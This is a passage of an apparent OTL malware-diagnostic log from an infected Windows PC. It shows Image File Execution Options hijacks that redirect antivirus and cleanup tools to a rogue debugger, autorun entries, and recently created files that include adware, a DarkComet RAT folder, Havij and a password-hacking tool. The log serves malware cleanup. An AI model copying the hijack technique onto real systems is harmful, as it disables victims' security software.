O27 - HKLM IFEO\blindman.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\ccuac.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\ComboFix.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\egui.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\hijackthis.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\instup.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\keyscrambler.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\mbam.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\mbamgui.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\mbampt.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\mbamscheduler.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\mbamservice.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\MpCmdRun.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\MSASCui.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\MsMpEng.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\msseces.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\rstrui.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\SDFiles.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\SDMain.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\SDWinSec.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\spybotsd.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\SUPERAntiSpyware.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\wireshark.exe: Debugger - nqij.exe File not found
O27 - HKLM IFEO\zlclient.exe: Debugger - nqij.exe File not found
O28:64bit: - HKLM ShellExecuteHooks: {AEB6717E-7E19-11d0-97EE-00C04FD91972} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2014/04/27 16:07:22 | 000,000,000 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O34 - HKLM BootExecute: (MACHINE BootExecut)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
Drivers32:64bit: msacm.bdmpeg - bdmpega64.acm ()
Drivers32:[b]64bit: msacm.l3acm - C:\Windows\System32\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS)
Drivers32:[b]64bit: VIDC.CSCD - camcodec.dll (CamStudio Group)
Drivers32:[b]64bit: vidc.mjpg - bdmjpeg64.dll ()
Drivers32:[b]64bit: vidc.mpeg - bdmpegv64.dll ()
Drivers32:[b]64bit: vidc.tscc - C:\Windows\SysWOW64\tsccvid64.dll (TechSmith Corporation)
Drivers32:[b]64bit: VIDC.XFR1 - xfcodec64.dll ()
Drivers32:[b]64bit: vidc.XVID - xvidvfw.dll ()
Drivers32: msacm.bdmpeg - C:\Windows\SysWow64\bdmpega.acm ()
Drivers32: msacm.l3acm - C:\Windows\SysWow64\l3codecp.acm (Fraunhofer Institut Integrierte Schaltungen IIS)
Drivers32: msacm.l3codecp - C:\Windows\SysWow64\l3codecp.acm (Fraunhofer Institut Integrierte Schaltungen IIS)
Drivers32: vidc.cvid - C:\Windows\SysWow64\iccvid.dll (Radius Inc.)
Drivers32: vidc.DIVX - C:\Windows\SysWow64\DivX.dll (DivX, Inc.)
Drivers32: vidc.iv50 - C:\Windows\SysWow64\ir50_32.dll (Intel Corporation)
Drivers32: vidc.mjpg - C:\Windows\SysWow64\bdmjpeg.dll ()
Drivers32: vidc.mpeg - C:\Windows\SysWow64\bdmpegv.dll ()
Drivers32: vidc.tscc - C:\Windows\SysWOW64\tsccvid.dll (TechSmith Corporation)
Drivers32: VIDC.XFR1 - C:\Windows\SysWow64\xfcodec.dll ()
Drivers32: vidc.XVID - C:\Windows\SysWow64\xvidvfw.dll ()
Drivers32: vidc.yv12 - C:\Windows\SysWow64\DivX.dll (DivX, Inc.)
CREATERESTOREPOINT
Unable to start System Restore Service. Error code 1084
========== Files/Folders - Created Within 30 Days ==========
[2014/05/30 11:08:43 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Owner\Desktop\OTL.exe
[2014/05/30 08:25:28 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HitmanPro
[2014/05/30 08:25:28 | 000,000,000 | ---D | C] -- C:\Program Files\HitmanPro
[2014/05/30 08:24:31 | 000,000,000 | ---D | C] -- C:\ProgramData\HitmanPro
[2014/05/30 08:21:29 | 000,000,000 | ---D | C] -- C:\VIPRERESCUE
[2014/05/28 08:43:24 | 000,000,000 | -HSD | C] -- C:\Users\Owner\Documents\WindSys
[2014/05/26 13:17:17 | 000,000,000 | ---D | C] -- C:\SMCLPAV
[2014/05/26 13:16:17 | 000,446,464 | ---- | C] (eHelp Corporation.) -- C:\Windows\SysWow64\HHActiveX.dll
[2014/05/26 13:15:21 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Panda Security
[2014/05/26 13:15:21 | 000,000,000 | ---D | C] -- C:\ProgramData\Panda Security
[2014/05/26 13:15:21 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Panda Security
[2014/05/26 13:12:20 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\360 Security Center
[2014/05/26 13:12:15 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\360
[2014/05/26 11:07:24 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\SearchProtect
[2014/05/26 10:42:08 | 000,000,000 | ---D | C] -- C:\Users\Owner\Desktop\rkill
[2014/05/26 09:47:02 | 000,000,000 | ---D | C] -- C:\NVIDIA
[2014/05/26 09:38:08 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\Ubisoft
[2014/05/26 08:38:13 | 000,000,000 | ---D | C] -- C:\5b752946a35719a003b287da
[2014/05/26 05:54:01 | 000,000,000 | ---D | C] -- C:\ProgramData\Comodo
[2014/05/26 04:39:52 | 000,000,000 | ---D | C] -- C:\ProgramData\YoutubeAdblocker
[2014/05/26 03:20:57 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\SpeedyPC Software
[2014/05/26 03:20:57 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\DriverCure
[2014/05/26 03:20:49 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpeedyPC Software
[2014/05/26 03:20:48 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\SpeedyPC Software
[2014/05/26 03:20:39 | 000,000,000 | ---D | C] -- C:\ProgramData\SpeedyPC Software
[2014/05/26 03:20:39 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SpeedyPC Software
[2014/05/26 01:39:19 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\KSafe
[2014/05/26 01:39:19 | 000,000,000 | ---D | C] -- C:\ProgramData\KSafe
[2014/05/26 01:39:14 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DllTool
[2014/05/26 01:39:11 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\DllTool
[2014/05/26 01:10:43 | 000,000,000 | ---D | C] -- C:\malware
[2014/05/26 01:09:35 | 000,000,000 | ---D | C] -- C:\Users\Owner\Documents\Malware
[2014/05/26 00:25:28 | 000,000,000 | -HSD | C] -- C:\ProgramData\{01BD4FC9-2F86-4706-A62E-774BB7E9D308}
[2014/05/25 23:48:17 | 000,000,000 | ---D | C] -- C:\_OTM
[2014/05/25 22:05:48 | 000,000,000 | ---D | C] -- C:\SUPERDelete
[2014/05/25 21:25:01 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\SUPERAntiSpyware.com
[2014/05/25 21:25:01 | 000,000,000 | ---D | C] -- C:\ProgramData\SUPERAntiSpyware.com
[2014/05/25 20:30:40 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Hamachi
[2014/05/25 20:30:36 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\LogMeIn Hamachi
[2014/05/25 20:28:05 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\dclogs
[2014/05/25 20:21:47 | 000,000,000 | -HSD | C] -- C:\ProgramData\Windows Server
[2014/05/25 19:55:13 | 000,000,000 | -HSD | C] -- C:\Windows\SysWow64\Windows Server
[2014/05/25 19:25:54 | 000,000,000 | ---D | C] -- C:\ProgramData\SNT
[2014/05/25 19:25:53 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SNT
[2014/05/25 19:24:36 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SearchProtect
[2014/05/25 19:24:24 | 000,000,000 | ---D | C] -- C:\ProgramData\TopApp software
[2014/05/25 19:22:37 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\YoutubeAdblocker
[2014/05/25 19:22:33 | 000,000,000 | ---D | C] -- C:\ProgramData\sAve on
[2014/05/25 19:22:33 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\Packages
[2014/05/25 19:22:32 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\sAve on
[2014/05/25 19:22:30 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\Torch
[2014/05/25 19:22:30 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\Chromatic Browser
[2014/05/25 19:22:30 | 000,000,000 | ---D | C] -- C:\ProgramData\5ad6ba851b005ffc
[2014/05/25 19:22:29 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\Comodo
[2014/05/25 19:20:32 | 000,000,000 | ---D | C] -- C:\ProgramData\InstallMate
[2014/05/25 18:21:17 | 000,188,928 | -H-- | C] (ghaMJsw) -- C:\Users\Owner\AppData\Roaming\File Name.exe
[2014/05/25 17:13:15 | 000,000,000 | ---D | C] -- C:\Users\Owner\AlwaysOnPC
[2014/05/25 16:29:11 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Local\Neptune
[2014/05/25 15:41:25 | 000,000,000 | ---D | C] -- C:\Users\Owner\Documents\AutomaticSolution Software
[2014/05/25 15:41:23 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\EasyAutoClicker
[2014/05/25 15:41:23 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Easy Auto Clicker
[2014/05/25 13:39:20 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\AminApps
[2014/05/25 13:39:20 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\A&N File Recovery
[2014/05/25 13:39:20 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\A&N File Recovery
[2014/05/21 22:10:14 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Twitter Password Hacking Tool v2.5.7
[2014/05/21 17:46:15 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Skype
[2014/05/18 18:44:38 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DarkComet RAT Legacy
[2014/05/18 18:44:34 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\PhrozenSoft
[2014/05/14 03:34:04 | 017,938,608 | ---- | C] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerInstaller.exe
[2014/05/14 03:18:43 | 000,084,992 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmled.dll
[2014/05/14 03:18:43 | 000,069,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmled.dll
[2014/05/14 03:18:22 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\DESIGNER
[2014/05/13 17:00:41 | 000,477,184 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aepdu.dll
[2014/05/13 17:00:41 | 000,424,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aeinv.dll
[2014/05/13 16:59:00 | 001,460,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\lsasrv.dll
[2014/05/13 16:58:59 | 003,969,984 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntkrnlpa.exe
[2014/05/13 16:58:59 | 003,914,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntoskrnl.exe
[2014/05/13 16:58:58 | 005,550,016 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ntoskrnl.exe
[2014/05/13 16:58:58 | 000,722,944 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\objsel.dll
[2014/05/13 16:58:58 | 000,455,168 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winlogon.exe
[2014/05/13 16:58:57 | 000,538,112 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\objsel.dll
[2014/05/13 16:58:57 | 000,424,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\KernelBase.dll
[2014/05/13 16:58:56 | 000,136,192 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\sspicli.dll
[2014/05/13 16:58:56 | 000,057,344 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\cngprovider.dll
[2014/05/13 16:58:56 | 000,056,832 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\adprovider.dll
[2014/05/13 16:58:56 | 000,053,760 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\capiprovider.dll
[2014/05/13 16:58:56 | 000,052,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dpapiprovider.dll
[2014/05/13 16:58:56 | 000,051,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\cngprovider.dll
[2014/05/13 16:58:56 | 000,049,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\adprovider.dll
[2014/05/13 16:58:56 | 000,048,128 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\capiprovider.dll
[2014/05/13 16:58:56 | 000,047,616 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\dpapiprovider.dll
[2014/05/13 16:58:56 | 000,044,544 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dimsroam.dll
[2014/05/13 16:58:56 | 000,039,936 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wincredprovider.dll
[2014/05/13 16:58:56 | 000,036,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\dimsroam.dll
[2014/05/13 16:58:56 | 000,035,328 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wincredprovider.dll
[2014/05/13 16:58:56 | 000,029,184 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\sspisrv.dll
[2014/05/13 16:58:56 | 000,028,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\secur32.dll
[2014/05/07 03:01:27 | 000,000,000 | --SD | C] -- C:\Windows\SysNative\CompatTel
[2014/05/04 11:45:23 | 000,260,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\RICHTX32.ocx
[2014/05/04 11:45:23 | 000,209,608 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\tabctl32.ocx
[2014/05/04 11:45:23 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Havij
[2014/05/04 11:45:22 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Havij
[2014/05/04 00:12:36 | 000,000,000 | ---D | C] -- C:\Users\Owner\Documents\Paint.NET User Files
[2014/05/03 14:36:58 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Maintenance Service
[2014/05/01 20:52:46 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
[2014/05/01 20:52:38 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome
[2014/05/01 20:20:54 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\MultiBit
[2014/05/01 20:20:31 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\MultiBit-0.5.18
[2014/05/01 20:20:31 | 000,000,000 | ---D | C] -- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MultiBit
[3 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
========== Files - Modified Within 30 Days ==========
[2014/05/30 23:07:14 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Owner\Desktop\OTL.exe
[2014/05/30 11:11:13 | 000,723,544 | ---- | M] () -- C:\Users\Owner\AppData\Roaming\msconfig.ini
[2014/05/30 10:51:16 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/05/30 10:47:49 | 000,045,581 | ---- | M] () -- C:\Users\Owner\Documents\mwb-error-2.png
[2014/05/30 10:46:12 | 000,040,689 | ---- | M] () -- C:\Users\Owner\Documents\mwb-error.png
[2014/05/30 10:40:01 | 000,019,344 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/05/30 10:40:00 | 000,019,344 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/05/30 10:31:45 | 000,032,512 | ---- | M] () -- C:\Windows\SysNative\drivers\hitmanpro37.sys
[2014/05/30 08:57:24 | 000,001,130 | ---- | M] () -- C:\Users\Owner\Desktop\ROBLOX Studio 2013.lnk
[2014/05/30 08:25:29 | 000,001,889 | ---- | M] () -- C:\Users\Public\Desktop\HitmanPro.lnk
[2014/05/28 10:25:52 | 000,002,235 | ---- | M] () -- C:\Windows\epplauncher.mif
[2014/05/26 13:12:20 | 000,001,049 | ---- | M] () -- C:\Users\Owner\Desktop\360 Total Security.lnk
[2014/05/26 10:41:58 | 000,000,468 | -H-- | M] () -- C:\Windows\tasks\SO.Booster-S-603818780.job
[2014/05/26 10:37:09 | 000,000,908 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-133263452-1906430011-745098151-1000UA.job
[2014/05/26 10:34:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/05/26 10:27:00 | 000,000,388 | ---- | M] () -- C:\Windows\tasks\update-S-1-5-21-133263452-1906430011-745098151-1000.job
[2014/05/26 10:22:00 | 000,000,388 | ---- | M] () -- C:\Windows\tasks\update-sys.job
[2014/05/26 10:17:00 | 000,000,924 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-133263452-1906430011-745098151-1005UA.job
[2014/05/26 10:06:04 | 000,000,894 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/05/26 10:05:00 | 000,000,384 | ---- | M] () -- C:\Windows\tasks\WpsUpdateTask_Nick.job
[2014/05/26 09:38:21 | 000,281,872 | ---- | M] () -- C:\Windows\SysWow64\PnkBstrB.exe
[2014/05/26 09:38:14 | 000,281,872 | ---- | M] () -- C:\Windows\SysWow64\PnkBstrB.ex0
[2014/05/26 09:38:13 | 000,076,888 | ---- | M] () -- C:\Windows\SysWow64\PnkBstrA.exe
[2014/05/26 09:15:01 | 000,000,928 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-133263452-1906430011-745098151-1000UA.job
[2014/05/26 05:36:34 | 002,993,976 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2014/05/26 03:21:01 | 000,000,444 | ---- | M] () -- C:\Windows\tasks\SpeedyPC Registration3.job
[2014/05/26 03:20:49 | 000,001,197 | ---- | M] () -- C:\Users\Owner\Desktop\SpeedyPC Pro.lnk
[2014/05/26 03:20:49 | 000,000,571 | ---- | M] () -- C:\Windows\tasks\SpeedyPC Pro_sch_A41C6437-E4AE-11E3-9423-0026188D9465.job
[2014/05/26 03:20:49 | 000,000,464 | ---- | M] () -- C:\Windows\tasks\SpeedyPC Update Version3_triggeronce.job
[2014/05/26 03:20:49 | 000,000,464 | ---- | M] () -- C:\Windows\tasks\SpeedyPC Update Version3.job
[2014/05/26 01:39:14 | 000,001,077 | ---- | M] () -- C:\Users\Owner\Desktop\DllTool.lnk
[2014/05/26 00:31:51 | 000,000,510 | ---- | M] () -- C:\Windows\tasks\SUPERAntiSpyware Scheduled Task e1800e5a-718e-492b-81f8-0f6a2e27702e.job
[2014/05/26 00:31:51 | 000,000,510 | ---- | M] () -- C:\Windows\tasks\SUPERAntiSpyware Scheduled Task 21055d1e-66ba-4203-943b-3df24c22fd8c.job
[2014/05/26 00:07:25 | 000,000,890 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/05/25 22:17:00 | 000,000,902 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-133263452-1906430011-745098151-1005Core.job
[2014/05/25 21:15:00 | 000,000,906 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-133263452-1906430011-745098151-1000Core.job
[2014/05/25 20:30:41 | 000,000,841 | ---- | M] () -- C:\Users\Public\Desktop\LogMeIn Hamachi.lnk
[2014/05/25 19:23:08 | 004,210,176 | ---- | M] () -- C:\Program Files (x86)\SO_x64.Booster
[2014/05/25 19:23:08 | 000,174,928 | ---- | M] () -- C:\Program Files (x86)\SOSvc.dll
[2014/05/25 19:23:07 | 004,296,192 | ---- | M] () -- C:\Program Files (x86)\SO.Booster
[2014/05/25 19:18:52 | 000,043,850 | -H-- | M] () -- C:\Users\Owner\AppData\Roaming\Ownerlog.dat
[2014/05/25 18:36:00 | 000,000,856 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-133263452-1906430011-745098151-1000Core.job
[2014/05/25 18:21:16 | 000,188,928 | -H-- | M] (ghaMJsw) -- C:\Users\Owner\AppData\Roaming\File Name.exe
[2014/05/25 15:41:24 | 000,001,123 | ---- | M] () -- C:\Users\Public\Desktop\Easy Auto Clicker.lnk
[2014/05/24 18:03:43 | 000,119,512 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys
[2014/05/22 16:28:13 | 000,426,834 | ---- | M] () -- C:\Users\Owner\AppData\Roaming\Bypasss.exe
[2014/05/20 18:20:04 | 000,002,098 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2014/05/20 16:15:03 | 000,000,334 | ---- | M] () -- C:\Windows\tasks\HPCeeScheduleForOwner.job
[2014/05/15 22:35:11 | 000,000,050 | ---- | M] () -- C:\Users\Owner\AppData\Roaming\install.imp
[2014/05/14 08:03:47 | 000,000,632 | RHS- | M] () -- C:\Users\Owner\ntuser.pol
[2014/05/14 03:34:12 | 000,692,400 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe
[2014/05/14 03:34:12 | 000,070,832 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
[2014/05/14 03:34:04 | 017,938,608 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerInstaller.exe
[2014/05/12 07:26:10 | 000,063,704 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mwac.sys
[2014/05/12 07:26:00 | 000,091,352 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2014/05/12 07:25:56 | 000,025,816 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbam.sys
[2014/05/10 19:36:06 | 000,002,046 | -H-- | M] () -- C:\Users\Owner\Documents\Default.rdp
[2014/05/09 01:14:03 | 000,477,184 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\aepdu.dll
[2014/05/09 01:11:23 | 000,424,448 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\aeinv.dll
[2014/05/05 22:00:47 | 000,084,992 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmled.dll
[2014/05/05 21:10:52 | 000,069,632 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmled.dll
[2014/05/03 14:37:00 | 000,001,143 | ---- | M] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2014/05/01 20:52:38 | 000,002,295 | ---- | M] () -- C:\Users\Owner\Desktop\Chrome App Launcher.lnk
[2014/05/01 20:20:31 | 000,001,813 | ---- | M] () -- C:\Users\Owner\Desktop\MultiBit 0.5.18.lnk
[3 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
========== Files Created - No Company Name ==========
[2014/05/30 10:47:49 | 000,045,581 | ---- | C] () -- C:\Users\Owner\Documents\mwb-error-2.png
[2014/05/30 10:46:12 | 000,040,689 | ---- | C] () -- C:\Users\Owner\Documents\mwb-error.png
[2014/05/30 10:30:32 | 000,032,512 | ---- | C] () -- C:\Windows\SysNative\drivers\hitmanpro37.sys
[2014/05/30 08:25:29 | 000,001,889 | ---- | C] () -- C:\Users\Public\Desktop\HitmanPro.lnk
[2014/05/26 13:12:20 | 000,001,049 | ---- | C] () -- C:\Users\Owner\Desktop\360 Total Security.lnk
[2014/05/26 03:21:01 | 000,000,444 | ---- | C] () -- C:\Windows\tasks\SpeedyPC Registration3.job
[2014/05/26 03:20:49 | 000,001,197 | ---- | C] () -- C:\Users\Owner\Desktop\SpeedyPC Pro.lnk
[2014/05/26 03:20:49 | 000,000,571 | ---- | C] () -- C:\Windows\tasks\SpeedyPC Pro_sch_A41C6437-E4AE-11E3-9423-0026188D9465.job
[2014/05/26 03:20:49 | 000,000,464 | ---- | C] () -- C:\Windows\tasks\SpeedyPC Update Version3_triggeronce.job
[2014/05/26 03:20:49 | 000,000,464 | ---- | C] () -- C:\Windows\tasks\SpeedyPC Update Version3.job
[2014/05/26 01:39:14 | 000,001,077 | ---- | C] () -- C:\Users\Owner\Desktop\DllTool.lnk
[2014/05/26 00:31:51 | 000,000,510 | ---- | C] () -- C:\Windows\tasks\SUPERAntiSpyware Scheduled Task e1800e5a-718e-492b-81f8-0f6a2e27702e.job
[2014/05/26 00:31:51 | 000,000,510 | ---- | C] () -- C:\Windows\tasks\SUPERAntiSpyware Scheduled Task 21055d1e-66ba-4203-943b-3df24c22fd8c.job
[2014/05/25 20:30:41 | 000,000,841 | ---- | C] () -- C:\Users\Public\Desktop\LogMeIn Hamachi.lnk
[2014/05/25 19:55:13 | 000,723,544 | ---- | C] () -- C:\Users\Owner\AppData\Roaming\msconfig.ini
[2014/05/25 19:24:25 | 000,000,468 | -H-- | C] () -- C:\Windows\tasks\SO.Booster-S-603818780.job
[2014/05/25 19:23:08 | 004,210,176 | ---- | C] () -- C:\Program Files (x86)\SO_x64.Booster
[2014/05/25 19:23:08 | 000,174,928 | ---- | C] () -- C:\Program Files (x86)\SOSvc.dll
[2014/05/25 19:23:07 | 004,296,192 | ---- | C] () -- C:\Program Files (x86)\SO.Booster
[2014/05/25 15:41:24 | 000,001,123 | ---- | C] () -- C:\Users\Public\Desktop\Easy Auto Clicker.lnk
[2014/05/22 16:26:59 | 000,372,109 | ---- | C] () -- C:\Users\Owner\AppData\Roaming\trolltest.sfx.exe
[2014/05/22 16:26:59 | 000,000,035 | ---- | C] () -- C:\Users\Owner\AppData\Roaming\um.bat
[2014/05/22 16:26:56 | 000,426,834 | ---- | C] () -- C:\Users\Owner\AppData\Roaming\Bypasss.exe
[2014/05/15 22:35:11 | 000,000,050 | ---- | C] () -- C:\Users\Owner\AppData\Roaming\install.imp
[2014/05/03 16:09:37 | 000,002,046 | -H-- | C] () -- C:\Users\Owner\Documents\Default.rdp
[2014/05/03 14:37:00 | 000,001,143 | ---- | C] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2014/05/03 14:36:59 | 000,001,155 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
[2014/05/01 20:52:38 | 000,002,295 | ---- | C] () -- C:\Users\Owner\Desktop\Chrome App Launcher.lnk
[2014/05/01 20:20:31 | 000,001,813 | ---- | C] () -- C:\Users\Owner\Desktop\MultiBit 0.5.18.lnk
[2014/04/19 22:12:33 | 000,645,632 | ---- | C] () -- C:\Windows\SysWow64\xvidcore.dll
[2014/04/19 22:12:33 | 000,240,640 | ---- | C] () -- C:\Windows\SysWow64\xvidvfw.dll
[2014/03/29 15:50:56 | 001,816,064 | ---- | C] () -- C:\Windows\SysWow64\libmysql_e.dll
[2013/11/16 01:15:12 | 000,000,600 | ---- | C] () -- C:\Users\Owner\AppData\Local\PUTTY.RND
[2013/10/03 21:58:42 | 000,000,441 | ---- | C] () -- C:\Users\Owner\AppData\Local\UserProducts.xml
